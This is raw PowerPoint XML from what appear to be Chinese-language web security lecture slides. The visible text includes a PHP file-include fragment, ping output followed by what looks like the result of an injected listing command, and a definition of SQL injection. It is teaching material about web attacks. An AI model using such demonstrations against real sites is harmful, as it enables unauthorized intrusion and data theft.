              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>';  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>?&gt;  </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0"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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1561020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nl-NL" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>64 bytes from 192.168.1.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=64 time=0.545 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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64 bytes from 192.168.1.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=64 time=0.550 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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64 bytes from 192.168.1.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=64 time=0.430 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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64 bytes from 192.168.1.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=64 time=0.385 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</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--- 192.168.1.1 ping statistics ---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4 packets transmitted, 4 received, 0% packet loss, time 3042ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rtt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>min</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>avg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>max</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 0.385/0.477/0.550/0.075 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:endParaRPr lang="mr-IN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>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68</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="973271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0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>所谓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>注入，就是通过把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>命令插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行指定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语句。具体来说，它是利用现有应用程序，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语句注入到后台数据库引擎执行的能力，它可以通过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>表单中输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语句得到一个存在安全漏洞的网站上的数据，而不是按照设计者意图去执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>应用为了和数据库进行沟通完成必要的管理和存储工作，必须和数据库保留一种接口。目前的数据库一般都是提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>以支持管理，应用使用底层开发语言如</a:t>
